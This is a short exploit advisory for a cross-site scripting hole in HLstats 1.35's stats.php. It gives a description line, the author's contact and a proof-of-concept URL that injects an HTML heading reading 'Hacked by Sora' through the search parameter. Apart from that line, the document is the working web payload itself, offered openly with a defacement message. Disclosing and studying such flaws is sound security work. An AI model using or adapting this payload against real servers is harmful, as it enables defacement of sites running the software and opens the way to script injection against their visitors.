-------------------------------------------
> HLstats 1.35 XSS Exploit
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/
 
# Description:
HLstats 1.35 is vulnerable to XSS in stats.php.
 
# PoC:
http://server/stats.php?mode=search&q=%3Ch2%3EHacked+by+Sora+-+grey.hat.hackers%3C%2Fh2%3E&st=player&game=cstrike